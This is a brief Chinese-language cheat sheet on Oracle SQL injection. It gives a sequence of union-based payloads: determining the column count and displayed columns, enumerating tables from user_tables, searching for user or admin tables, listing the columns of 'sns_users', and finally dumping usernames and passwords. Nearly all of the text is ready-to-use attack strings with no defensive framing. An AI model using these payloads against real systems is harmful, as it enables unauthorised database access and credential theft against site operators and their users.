Oracle数据库注入
判断列数和显错位
union select '1','2' from dual
暴库名
union select '1',(select table_name from user_tables where rownum=1) from dual
模糊查询表名
查询表名一般查询admin或者user表
union select '1',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
查询列名
union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual
查询列数据
union select user_name,user_pwd from "sns_users"